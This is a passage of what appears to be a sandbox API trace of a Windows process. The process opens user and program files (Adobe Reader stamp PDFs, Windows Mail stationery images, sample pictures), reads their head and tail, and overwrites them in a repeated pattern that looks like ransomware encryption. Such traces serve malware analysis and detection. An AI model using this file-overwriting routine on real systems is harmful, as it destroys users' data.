lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0064.248] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xeac7 [0064.248] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0064.248] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.248] ReleaseMutex (hMutex=0x168) returned 1 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f733ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.248] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.251] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xdac7 [0064.251] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.252] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xdac7 [0064.252] WriteFile (in: hFile=0x1e4, lpBuffer=0x269e578*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e578*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.253] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0064.253] WriteFile (in: hFile=0x1e4, lpBuffer=0x2698418*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.253] CloseHandle (hObject=0x1e4) returned 1 [0064.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.257] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0064.257] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb731 [0064.257] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0064.257] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.257] ReleaseMutex (hMutex=0x168) returned 1 [0064.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.257] ReadFile (in: hFile=0x1e4, lpBuffer=0x2698418, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.260] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa731 [0064.260] ReadFile (in: hFile=0x1e4, lpBuffer=0x2698418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.261] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa731 [0064.261] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.261] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0064.261] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.261] CloseHandle (hObject=0x1e4) returned 1 [0064.276] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.277] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0064.277] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1c4f5 [0064.277] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0064.277] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.278] ReleaseMutex (hMutex=0x168) returned 1 [0064.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.278] ReadFile (in: hFile=0x1e4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.518] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b4f5 [0064.518] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.888] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b4f5 [0064.889] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.889] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0064.889] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.889] CloseHandle (hObject=0x1e4) returned 1 [0064.892] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0065.098] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.098] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe27c [0065.099] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.099] ReleaseMutex (hMutex=0x168) returned 1 [0065.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0065.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0065.099] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.102] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xd27c [0065.102] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.103] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xd27c [0065.103] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.103] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0065.103] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.104] CloseHandle (hObject=0x1e4) returned 1 [0065.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0065.123] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.123] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb731 [0065.123] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.123] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.123] ReleaseMutex (hMutex=0x168) returned 1 [0065.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.124] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.126] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa731 [0065.126] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.127] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa731 [0065.127] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.127] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0065.127] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.127] CloseHandle (hObject=0x1e4) returned 1 [0065.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0065.426] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.427] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x5d3f [0065.427] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.427] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.427] ReleaseMutex (hMutex=0x168) returned 1 [0065.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.jpg", lpUsedDefaultChar=0x0) returned 10 [0065.427] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.429] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4d3f [0065.429] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.430] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4d3f [0065.430] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.431] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0065.431] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.431] CloseHandle (hObject=0x1e4) returned 1 [0065.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0065.432] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.433] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1d51 [0065.433] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.433] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.433] ReleaseMutex (hMutex=0x168) returned 1 [0065.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.jpg", lpUsedDefaultChar=0x0) returned 9 [0065.433] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1d51, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1d51, lpOverlapped=0x0) returned 1 [0065.435] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0065.435] WriteFile (in: hFile=0x1e4, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x22d9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x22d9, lpOverlapped=0x0) returned 1 [0065.436] CloseHandle (hObject=0x1e4) returned 1 [0065.439] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0065.439] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.439] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x107e [0065.439] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.439] ReleaseMutex (hMutex=0x168) returned 1 [0065.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0065.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HandPrints.jpg", lpUsedDefaultChar=0x0) returned 14 [0065.440] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x107e, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x107e, lpOverlapped=0x0) returned 1 [0065.441] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0065.442] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1606, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1606, lpOverlapped=0x0) returned 1 [0065.442] CloseHandle (hObject=0x1e4) returned 1 [0065.443] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0065.443] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.444] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xce875 [0065.444] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: 